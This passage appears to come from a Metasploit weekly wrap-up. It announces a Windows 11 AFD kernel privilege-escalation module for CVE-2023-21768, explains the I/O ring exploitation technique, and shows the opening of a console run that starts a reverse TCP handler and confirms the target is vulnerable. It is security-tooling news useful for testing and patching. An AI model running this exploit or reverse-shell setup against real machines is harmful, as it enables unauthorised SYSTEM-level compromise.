Rapid7 - Metasploit Weekly Wrap-up

Windows 11 AFD WinSock Priv Esc

The new windows/local/cve_2023_21768_afd_lpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the I/O ring feature introduced in Windows 11 21H2. The technique comes from Yarden Shafir's research and provides a full kernel read/write primitive on Windows 11. The underlying vulnerability is a write-where bug that allows an arbitrary one-byte write into kernel memory. That is enough to modify the I/O ring's internal structures and get remote code execution as the NT AUTHORITY\SYSTEM user. The Metasploit module is based on the exploit PoC authored by chompie1337 and b33f.

Example run against Windows 11 Version 22H2 Build 22621.963 x64:

msf6 exploit(windows/local/cve_2023_21768_afd_lpe) > run verbose=true
[*] Started reverse TCP handler on 192.168.100.9:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Windows Build Number = 22621.963
[+] The target appears to be vulnerable.
[*] Launching netsh to